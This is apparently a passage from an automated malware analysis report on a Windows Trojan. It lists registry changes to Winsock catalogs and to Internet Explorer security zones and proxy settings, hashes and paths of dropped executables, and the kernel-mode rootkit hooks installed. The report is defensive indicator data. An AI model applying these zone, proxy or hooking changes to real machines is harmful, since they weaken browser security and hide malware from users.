"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1001"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableFileTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh\Napmontr]
"Guid" = "710adbf0-ce88-40b4-a50d-231ada6593f0"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Provider List" = ""

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]
"WinSock 2.0 Provider ID" = "30 18 5F 8D 73 C2 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Setup Version" = "4105"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
"Known Static Providers" = "Tcpip, NwlnkIpx, NwlnkSpx, AppleTalk, IsoTp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"Guid" = "b0278a28-76f1-4e15-b1df-14b209a12613"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"EnableConsoleTracing" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0F CF 21 29 2E 4E 77 FE B6 5E A5 43 70 0E 28 BA"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"AppleTalk" = "A0 17 3B 2C DF C6 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileDirectory" = "%windir%\tracing"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
"Serial_Access_Num" = "1"
"Num_Catalog_Entries" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Tracing\FWCFG]
"FileTracingMask" = "4294901760"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"IsoTp" = "B0 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\NAP\Netsh]
"LogSessionName" = "stdout"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\qagent\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
"McsXns" = "B1 CB E4 89 C1 B9 CF 11 95 C8 00 80 5F 48 A1 92"

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

The Trojan deletes the following registry key(s):

[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000002]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000005]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000004]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000007]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000006]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000009]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000008]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000001]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000003]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\00000002]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Well Known Guids]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\Tcpip]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000012]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000013]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000010]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries\000000000011]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9]
[HKLM\System\CurrentControlSet\Services\WinSock2\Parameters\Protocol_Catalog9\Catalog_Entries]
[HKLM\System\CurrentControlSet\Services\Winsock\Setup Migration\Providers\NetBIOS]

The process EXE_temp3.exe:816 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000005]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCR\Shell.User\Group]
"bl" = "A9 91 9C 93 24 46 01 23 62 18 79 19 0C 77 50 72"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000006]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"

[HKCR\Shell.User]
"mmc" = "0050563cacd6"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCR\Shell.User\Group\001]
"(Default)" = "4A 7C 2C 77 6E 02 24 14 9D DB D7 C6 BB 04 7A 13"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"LibraryPath" = "%SystemRoot%\System32\winrnr.dll"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"DisplayString" = "网络位置知晓 (NLA) 名称空间"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Serial_Access_Num" = "4"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"StoresServiceClassInfo" = "0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCR\Shell.User]
"nam" = "58lm/temptation.bin"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Enabled" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Version" = "0"

[HKCR\Shell.User\Group]
"lb" = "E0 89 2F 53 1D 22 70 19 48 38 3F 78 54 6B 83 93"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000002]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCR\Shell.User\Group]
"lh" = "C6 B4 D0 9F A2 CB D4 B0 BB AD FF A7 56 06 63 5D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000009]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5]
"Num_Catalog_Entries" = "3"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"SupportedNameSpace" = "15"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCR\Shell.User\Group\001]
"dat" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 0B 74 25 87 0B 8C 56 3B B8 3C F3 4E 22 C1 A7"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"SupportedNameSpace" = "32"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Next_Catalog_Entry_ID" = "1027"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_Protocol_Catalog" = "Protocol_Catalog9"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000003]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"LibraryPath" = "%SystemRoot%\System32\mswsock.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"StoresServiceClassInfo" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"DisplayString" = "NTDS"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000010]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"WinSock_Registry_Version" = "2.0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"Version" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"Enabled" = "1"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKCR\Shell.User\Group]
"cfg" = "57 56 1B 01 5E 4C 05 5C 14 19 18 15 1E 0A 13 59"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"DisplayString" = "Tcpip"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000011]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000007]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"StoresServiceClassInfo" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"Enabled" = "1"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2]
"Current_NameSpace_Catalog" = "NameSpace_Catalog5"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000004]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"SupportedNameSpace" = "12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000008]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"DefaultConnectionSettings" = "3C 00 00 00 01 00 00 00 03 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000001]
"ProviderId" = "40 9D 05 22 9E 7E CF 11 AE 5A 00 AA 00 A7 11 2B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9\Catalog_Entries\000000000001]
"PackedCatalogItem" = "25 53 79 73 74 65 6D 52 6F 6F 74 25 5C 73 79 73"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000002]
"ProviderId" = "EE 37 26 3B 80 E5 CF 11 A5 55 00 C0 4F D8 D4 AC"
"Version" = "0"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Serial_Access_Num" = "12"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\NameSpace_Catalog5\Catalog_Entries\000000000003]
"ProviderId" = "3A 24 42 66 A8 3B A6 4A BA A5 2E 0B D7 1F DD 83"

[HKLM\System\CurrentControlSet\Services\WinSock2\P2\Protocol_Catalog9]
"Num_Catalog_Entries" = "11"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

The process MiniIE.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 D7 28 7A 25 5D D9 D2 9F EC C0 58 AD FB 76 5B"

[HKCR\Microsoft.PubIE]
"(Default)" = "%WinDir%\JMt\MiniIE.exe"

The process qtool.exe:3460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "DD D9 B6 E0 D6 CA 25 68 19 49 38 F7 A3 05 6F 90"

The process EXE_temp0.exe:980 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0E 3F D9 80 23 28 AE DA BA 09 DF 20 13 55 0A DA"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The process wpzir.exe:3300 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "95 1B A5 9B 95 89 B1 80 07 DC 08 1E E3 81 E5 9C"

The process %original file name%.exe:1040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C 9A 60 99 5B 65 DF 0F 28 7E 33 17 29 04 B9 BF"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp1.EXE" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"EXE_temp4.EXE" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

The Trojan modifies IE settings for security zones to map all URLs to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypass the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

Dropped PE files

MD5 File path
30b0c990aec1f50be231a3856ecb3bf8 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp0.exe
aed6d5df54ffc8b690ac09b59b3ca430 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp1.EXE
2a1032cde760529d39f4c5f8726dc2a9 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp2.exe
a14c1a37f8bfa01fac48c2e55e0ba1b5 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\EXE_temp4.EXE
a15e8668aa777e4d4150aee35d2ff6a3 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Sawrdxeyd.exe
a0616a47dd5ee80322aef4316c392c28 c:\Program Files\Common Files\Lkcjzquw.exe
8ae4a1d90f2a6e9385945db349908df5 c:\Program Files\Common Files\mdhc\dsau.exe
cf31b64c744a98a0407f4507ae113702 c:\WINDOWS\JMt\MiniIE.exe
0bdf9d8c796730d85f4a1a249a033f8d c:\WINDOWS\JMt\sys32\qtool.exe
c20aa25e91066fccc444a58542c23dd9 c:\WINDOWS\JMt\sys32\shock.dll
5d92b4c13bafd09fad76ef97c48fec0e c:\WINDOWS\JMt\sys32\shock.exe
add24b3c6cb353cdad827d12c751427d c:\WINDOWS\JMt\win32\DPro.sys
a76ad9fe26c1986b1d7f1c8ef8d44c7b c:\WINDOWS\JMt\win32\reTcp.sys
43577fc3cc5c7db31ee2f778d738fda8 c:\WINDOWS\JMt\win32\rename.exe
cc686eb2b7a4ade59e1c4092cba060a9 c:\WINDOWS\JMt\win32\svchots.exe
e9e72a6dbeacd5baa07688de88180a48 c:\WINDOWS\JMt\wpzir.exe
39462f857848c335921707727b66df46 c:\WINDOWS\share\ico.dll
c6ad526a469588556ff14961929e0713 c:\WINDOWS\share\rsvp\objs.exe
a131b4be9f388351e102feb40192db80 c:\WINDOWS\system32\DqKgbb.dll
51af4e81bc4bd3abf1cb8ce8703b364f c:\WINDOWS\system32\drivers\HideSys.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

The Trojan installs the following kernel-mode hooks:

ZwCreateSection
ZwOpenProcess
ZwQuerySystemInformation

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 1630 4096 2.08739 a5ac40d413ebeb6ce9558f2e31e30273
.rdata 8192 1002 4096 1.10247 845b3880bb89b7f2d62318a9a4946b4b
.data 12288 1172 4096 0.052325 98570c295ac0b95b533a0c5458850e63
.rsrc 16384 928 4096 0.559435 26a9e24fa9407d501ca0b0c40ee8d6a1
.fyf 20480 73728 73728 5.42306 5de1b1bb94e796f2272dd007d3f6e0a0
.FYF 94208 151552 151552 4.48946 b063438bbfbe3ad481ac57d58a6e5403
.fyf 245760 24576 24576 1.2573 99258b4abbf40d5dd4b49639f1d3e8ea
.fyf 270336 139264 139264 5.508 2b1cc40328f8cdd81d81a5fcc4a97692
